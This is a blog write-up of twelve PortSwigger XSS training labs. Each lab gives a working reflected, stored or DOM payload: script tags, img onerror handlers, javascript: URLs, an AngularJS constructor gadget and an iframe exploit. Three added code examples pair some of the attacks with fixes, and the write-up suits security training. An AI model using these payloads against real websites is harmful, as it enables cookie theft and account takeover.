
PortSwigger lab write-ups: XSS attack exercises

Author: 互联网 (as credited on the source page)


Lab 1: Reflected XSS with nothing encoded

Lab

html-context-nothing-encoded

Description

This lab contains a simple reflected cross-site scripting vulnerability in the search functionality.

To solve the lab, perform a cross-site scripting attack that calls the alert function.

Solution

Submit the simplest XSS payload directly in the search parameter. The URL-encoded form below is what appears in the request; it decodes to `<script>alert()</script>`:

<script>alert%28%29<%2Fscript>

Lab 2: Stored XSS with nothing encoded

Lab

html-context-nothing-encoded

Description

This lab contains a stored cross-site scripting vulnerability in the comment functionality.

To solve this lab, submit a comment that calls the alert function when the blog post is viewed.

Solution

Post the simplest XSS payload as a blog comment; when the post page is loaded, the stored XSS fires:

<script>alert()</script>

Lab 3: DOM XSS that reads a parameter from the URL and writes it into the DOM

DOM XSS that obtains the parameter with location.search and rebuilds the DOM with document.write

Lab

document-write-sink

Description

This lab contains a DOM-based cross-site scripting vulnerability in the search query tracking functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search, which you can control using the website URL.

To solve this lab, perform a cross-site scripting attack that calls the alert function.

Solution

The search term the user enters is concatenated by the page's JS into the src attribute of an img tag that document.write inserts into the DOM. Use `"` to close the src attribute and `>` to close the img tag, then append the XSS code. Because document.write runs while the page is still being parsed, the injected script tag is parsed and executed:

search="><script>alert()</script>

Lab 4: DOM XSS that reads a parameter from the URL and writes it via innerHTML

Lab

innerhtml-sink

Description

This lab contains a DOM-based cross-site scripting vulnerability in the search blog functionality. It uses an innerHTML assignment, which changes the HTML contents of a div element, using data from location.search.

To solve this lab, perform a cross-site scripting attack that calls the alert function.

Solution

When content is assigned through innerHTML, a script tag inside it is inserted but never executed, so instead use the onerror event of an img tag with an invalid src to run the code automatically:

<img src=2 onerror=alert()>

Lab 5: DOM XSS that modifies an element attribute through a jQuery selector

Lab

jquery-href-attribute-sink

Description

This lab contains a DOM-based cross-site scripting vulnerability in the submit feedback page. It uses the jQuery library's $ selector function to find an anchor element, and changes its href attribute using data from location.search.

To solve this lab, make the "back" link alert document.cookie.

Solution

On the Submit feedback page, the "back" button is an a tag whose href attribute is set by JS from the returnPath query parameter of the URL. Setting that parameter to a javascript: URL makes the code run when the link is clicked. The lab specifically checks for alert(document.cookie), so use:

?returnPath=javascript:alert(document.cookie)

Lab 6: DOM XSS in a jQuery selector sink triggered by a hashchange event

Lab

jquery-selector-hash-change-event

Description

This lab contains a DOM-based cross-site scripting vulnerability on the home page. It uses jQuery's $() selector function to auto-scroll to a given post, whose title is passed via the location.hash property.

To solve the lab, deliver an exploit to the victim that calls the print() function in their browser.

Solution

I didn't fully work this one out. Reading the JS source: on every hashchange the page takes the fragment, URL-decodes it, concatenates it into a jQuery selector of the form `section.blog-list h2:contains(...)`, and scrolls to the matched post. The exploit server delivers a page whose iframe points at the lab and then appends an img tag to the fragment; the resulting hashchange feeds that markup into `$()`, which creates the element, and its onerror handler calls print().

(Official solution) On the exploit server, set the body to:

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
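Why appending an img tag to the fragment is enough, as an added example that is not part of the original write-up or of the lab's own code. It re-creates the selector string the page's hashchange handler builds and applies the "is this string HTML?" regular expressions transcribed from the jQuery 1.8.x and 1.9.x sources (the assumption is that the lab bundles a 1.8-era jQuery; check the version in the page's script tag). The `findPostIndex` function shows the fix: compare untrusted text against titles with a function instead of interpolating it into a selector.

```javascript
// Added example: not from the write-up or the lab. Re-creates the selector the lab's
// hashchange handler builds and checks how jQuery would interpret it.

// Selector built the way the lab's handler does: untrusted fragment text is
// concatenated straight into the selector string.
function buildSelector(hash) {
  return 'section.blog-list h2:contains(' + decodeURIComponent(hash) + ')';
}

// HTML-detection regexes transcribed from jQuery sources (assumption: the lab ships a
// 1.8-era jQuery). 1.8.x accepts arbitrary text before the first <tag>, so a selector
// that merely *contains* markup is handed to the HTML parser; 1.9+ requires the
// string to start with "<".
const RQUICK_EXPR_1_8 = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;
const RQUICK_EXPR_1_9 = /^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/;

// Returns 'html' when $(str) would parse str as markup (creating the <img> and
// firing its onerror), 'selector' when it would run str as a CSS selector.
function jqueryInterpretation(str, rquickExpr) {
  const m = rquickExpr.exec(str);
  return m && m[1] ? 'html' : 'selector';
}

// Hardened lookup: the untrusted text is only ever compared against title text and
// never becomes part of a selector. `titles` stands in for the page's h2 elements.
function findPostIndex(titles, hash) {
  const wanted = decodeURIComponent(hash);
  return titles.findIndex(t => t.includes(wanted));
}

// Constructed inputs: a benign fragment and the payload the iframe appends to the URL.
const BENIGN_HASH = 'Hello';
const PAYLOAD_HASH = '<img src=x onerror=print()>';
```

Under the 1.8 rule the payload selector is classified as HTML, so `$()` creates the img element and print() runs; under the 1.9 rule the same string is treated as a (non-matching) selector. `findPostIndex` returns -1 for the payload and never creates elements at all.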

Lab 7: Reflected XSS into an attribute with angle brackets HTML-encoded

Lab

attribute-angle-brackets-html-encoded

Description

This lab contains a reflected cross-site scripting vulnerability in the search blog functionality where angle brackets are HTML-encoded. To solve this lab, perform a cross-site scripting attack that injects an attribute and calls the alert function.

Solution

Angle brackets are encoded here. Looking at the page, the search text ends up as the value attribute of an input tag. Close the value attribute with a double quote, add an onmouseover handler that runs the XSS code, and let a dummy attribute `a="` absorb the original closing quote so the markup stays well-formed:

" onmouseover=alert() a="

Lab 8: Stored XSS into an href attribute with double quotes HTML-encoded

Lab

href-attribute-double-quotes-html-encoded

Description

This lab contains a stored cross-site scripting vulnerability in the comment functionality. To solve this lab, submit a comment that calls the alert function when the comment author name is clicked.

Solution

The website entered in the blog comment form becomes the href attribute of the a tag wrapped around the author name. Double quotes are encoded, but a javascript: URL needs none, so it runs when the author name is clicked. Fill the Website field with:

Website:

javascript:alert()

Lab 9: Reflected XSS into a JavaScript string with angle brackets HTML-encoded

Lab

javascript-string-angle-brackets-html-encoded

Description

This lab contains a [reflected cross-site scripting](https://portswigger.net/web-security/cross-site-scripting/reflected) vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the `alert` function.

Solution

Looking at the page's JS, the search term is reflected inside a single-quoted string. Close the string with `'`, insert a new statement, and reopen a string so the rest of the original line still parses:

';alert();'

Lab 10: DOM XSS inside a select element

Lab

document-write-sink-inside-select-element

Description

This lab contains a DOM-based cross-site scripting vulnerability in the stock checker functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search which you can control using the website URL. The data is enclosed within a select element.

To solve this lab, perform a cross-site scripting attack that breaks out of the select element and calls the alert function.

Solution

Looking at the JS, the storeId parameter from the URL is written into the DOM by document.write as an option inside the select. The payload below works without closing the select first: the HTML parser's "in select" insertion mode hands a script start tag to the "in head" rules, so the script element is still created and executed. Closing the select with `</select>` ahead of the payload is the break-out the lab description has in mind, and is needed if you use an element other than script.

storeId=<script>alert()</script>

Lab 11: DOM XSS in an AngularJS expression with angle brackets and double quotes HTML-encoded

Lab

angularjs-expression

Description

This lab contains a [DOM-based cross-site scripting](https://portswigger.net/web-security/cross-site-scripting/dom-based) vulnerability in an [AngularJS](https://portswigger.net/web-security/cross-site-scripting/contexts/angularjs-sandbox) expression within the search functionality.

AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the `ng-app` attribute (also known as an AngularJS directive). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces. This technique is useful when angle brackets are being encoded.

To solve this lab, perform a [cross-site scripting](https://portswigger.net/web-security/cross-site-scripting) attack that executes an AngularJS expression and calls the `alert` function.

Solution

AngularJS evaluates the expression inside double curly braces against the scope. `$on` is a method of the scope, so `$on.constructor` is the global Function constructor, which compiles the string into a function; the trailing `()` calls it. No angle brackets or quotes other than the single quotes are needed:

{{$on.constructor('alert(1)')()}}
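The general form of this gadget, as an added example that is neither the write-up's nor AngularJS's own code. Every function reachable from the scope object carries a `.constructor` that is the global Function, so any exposed method is a route to compiling attacker-supplied source. The scope below is a constructed stand-in whose method names (`$on`, `$watch`, `$eval`) are real AngularJS Scope methods; on a real scope they live on the prototype, which the walk simplifies into own properties, and the real scope exposes many more.

```javascript
// Added example: not from the write-up or AngularJS. Walks an object graph and lists
// the property paths at which the global Function constructor becomes reachable.

// Constructed stand-in for an AngularJS scope (real scopes have these methods on
// the prototype and expose many more).
const fakeScope = {
  title: 'search',
  $on: function (name, listener) {},
  $watch: function (expr, listener) {},
  $eval: function (expr) {},
  $$listeners: {},
};

// Breadth-first walk over own enumerable properties plus `constructor`, up to
// maxDepth levels, returning dotted paths at which Function itself is reached.
function findFunctionConstructorPaths(root, maxDepth) {
  const found = [];
  const seen = new Set([root]);
  let frontier = [{ value: root, path: '' }];
  for (let depth = 0; depth < maxDepth && frontier.length; depth++) {
    const next = [];
    for (const { value, path } of frontier) {
      const keys = new Set(Object.keys(value));
      keys.add('constructor'); // inherited, but reachable from any expression
      for (const key of keys) {
        const child = value[key];
        const childPath = path ? path + '.' + key : key;
        if (child === Function) {
          found.push(childPath);
          continue;
        }
        const walkable = child !== null && (typeof child === 'object' || typeof child === 'function');
        if (walkable && !seen.has(child)) {
          seen.add(child);
          next.push({ value: child, path: childPath });
        }
      }
    }
    frontier = next;
  }
  return found;
}

// What the template expression does once Function is reached: follow the path and
// compile attacker-controlled source. Returns the compiled function without calling it.
function compileViaPath(scope, path, source) {
  const ctor = path.split('.').reduce((obj, key) => obj[key], scope);
  return ctor(source); // equivalent of $on.constructor('alert(1)')
}
```

On this scope the walk reports `$on.constructor`, `$watch.constructor`, `$eval.constructor` and `constructor.constructor` within three levels; any of them can replace `$on.constructor` in the payload. Blocking `constructor` lookups in the expression evaluator is what the AngularJS sandbox tried, and it was bypassed repeatedly before being removed; the fix is server-side: never reflect unescaped user input inside an element under ng-app, or mark such regions ng-non-bindable.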

Lab 12: Reflected DOM XSS

Lab

dom-xss-reflected

Description

This lab demonstrates a reflected DOM vulnerability. Reflected DOM vulnerabilities occur when the server-side application processes data from a request and echoes the data in the response. A script on the page then processes the reflected data in an unsafe way, ultimately writing it to a dangerous sink.

To solve this lab, create an injection that calls the alert() function.

Solution

First submit a search from the search box and look at the page source. In searchResults.js, an anonymous callback runs when the server's response arrives.

Inside that callback, `eval('var searchResultsObj = ' + this.responseText)` concatenates the response body into a string and evaluates it as JavaScript, so the reflected search term is parsed as code rather than as data.
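A model of that sink, as an added example that is neither the write-up's nor the lab's code. It pairs the client-side `eval` the write-up identifies with a constructed server-side serializer; the assumption (labelled in the code) is that the server escapes double quotes in the reflected search term but not backslashes, the classic defect that lets a term close the JSON string early. The same response is then fed to `JSON.parse`, and the same payload is serialized correctly, to show which side of the fix actually removes the bug. `alertStandIn` replaces `alert()` so the effect can be counted.

```javascript
// Added example: not from the write-up or the lab. Models the eval() sink over a
// reflected JSON response and compares it with JSON.parse.

// Search term constructed to break out of a JSON string under the buggy escaping:
// backslash, quote, an expression, a closing brace, then a line comment.
const PAYLOAD = '\\"-alertStandIn()}//';

// Constructed, deliberately defective server-side serializer (assumption: escapes
// double quotes but leaves backslashes alone). NOT real JSON.stringify.
function buggyServerJson(searchTerm) {
  const escaped = searchTerm.replace(/"/g, '\\"');
  return '{"results":[],"searchTerm":"' + escaped + '"}';
}

// Correct serializer: backslashes and quotes are both escaped.
function correctServerJson(searchTerm) {
  return JSON.stringify({ results: [], searchTerm });
}

// The vulnerable client sink, shaped like the one the write-up describes.
// Returns how many times injected code reached alertStandIn plus the parsed term.
function evalSink(responseText) {
  let alerted = 0;
  function alertStandIn() { alerted++; return 0; } // reachable from eval'd code via scope
  // The trailing newline keeps the final expression outside any "//" the payload injects.
  const result = eval('var searchResultsObj = ' + responseText + ';\nsearchResultsObj');
  return { alerted, searchTerm: result.searchTerm, error: null };
}

// The safe sink: JSON.parse never executes anything; malformed input is an error.
function jsonParseSink(responseText) {
  try {
    const obj = JSON.parse(responseText);
    return { alerted: 0, searchTerm: obj.searchTerm, error: null };
  } catch (e) {
    return { alerted: 0, searchTerm: undefined, error: e.name };
  }
}
```

With the buggy serializer and `eval`, the payload runs (`alerted` becomes 1); with the correct serializer the same payload comes back as a plain string even under `eval`, and with `JSON.parse` the buggy response is rejected as a SyntaxError instead of executing. Fixing the escaping alone leaves `eval` waiting for the next encoding mistake; replacing `eval` with `JSON.parse` removes the sink.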


Source: https://www.cnblogs.com/zhoujinxuan/p/16268862.html